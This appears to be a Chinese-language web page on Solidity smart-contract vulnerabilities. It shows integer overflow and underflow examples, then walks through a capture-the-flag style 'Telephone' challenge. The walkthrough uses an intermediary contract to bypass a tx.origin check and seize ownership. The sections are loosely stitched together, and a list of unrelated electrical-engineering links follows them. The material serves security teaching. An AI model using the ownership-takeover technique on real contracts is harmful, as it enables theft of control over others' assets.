整数溢出和下溢
与C和C ++一样,Solidity是一种比较低级别的编码语言,没有处理存储限制的功能。这可能与Ruby和Python开发人员习惯的非常不同。
以太坊的智能合约存储分别为256位或32字节。 Solidity支持有符号整数和无符号整数uint,最高可达256位。
这意味着当您的数字超过在分配的存储位之下或之上时,您的算术运算容易出现下溢和溢出错误。
注意:最大可能的uint256等于115792089237316195423570985008687907853269984665640564039457584007913129639935
contract Unsigned {
uint8 public min = 0;
uint8 public max = 255;
// Underflowing & overflowing doesn‘t throw an error
uint8 public less_than_min = min - 1; // returns 255
uint8 public more_than_max = max + 1; // returns 0
}
contract Signed {
int8 public min = -128;
int8 public max = 127;
int8 public less_than_min = min - 1; // returns 127
int8 public more_than_max = max +1; // returns -128
}
以下是上面代码段的可视化:
这会使得处理算术运算符的合约易受攻击。通常我们从safemath.sol库继承数学运算符。
细节演练
1. 注意Telephone.sol的changeOwner函数检查是否(tx.origin!= msg.sender)。似乎我们可以通过方案3成功触发此功能:区块链研究实验室| 如何防止滥用智能合约中的伪随机性
2. 创建一个电话合约,Telephony构成合同A.在Telephony中实例化合约B,您的Telephone.sol:
contract Telephony {
Telephone public phone = Telephone(YOUR_INSTANCE_ADDR_HERE);
//TODO.。.
}
3、在Telephony中创建一个changeOwner函数,该函数调用Telephone中的changeOwner函数,即玩电话游戏。
function changeOwner(address _owner) public {
phone.changeOwner(_owner);
}
4、注意await contract.owner()在控制台中现在指示您的用户钱包是所有者!
相关热词:#区块链
基于物联网云平台的分布式光伏监控系统的设...
时间:2026-03-05
关于建筑强弱电的基础知识
时间:2026-03-05
变压器容量计算公式及注意事项
时间:2026-03-05
浅谈电气控制柜二次回路布线规则
时间:2026-03-05
高低压配电系统组成和作用 移动基站直流系统...
时间:2026-03-05
超级电容器助力电网调频装置
时间:2026-03-05
固德威光储充一体化电站设计解决方案
时间:2026-03-05
海凌科WiFi模块在光伏逆变器的应用
时间:2026-03-05
什么是电气一次,二次?
时间:2026-03-05
TT、IT、TN三种电力供电系统的区别
时间:2026-03-05
变电站接地变压器的原理、作用和连接方式
时间:2026-03-05
一二次融合环网柜和普通环网柜区别 一二次融...
时间:2026-03-05
电气控制系统的系统组成
时间:2026-03-05
智能电网的核心技术分析
时间:2026-03-05
微电网现状与发展趋势
时间:2026-03-05
电能输送的四个过程 电能输送损耗公式
时间:2026-03-05
智能电表远程控制系统
时间:2026-03-05
充电桩安装需要满足哪些条件 充电桩的安装要...
时间:2026-03-05
智能电网的概念及优势
时间:2026-03-05
智能电表远程预付费系统项目的设计与应用
时间:2026-03-05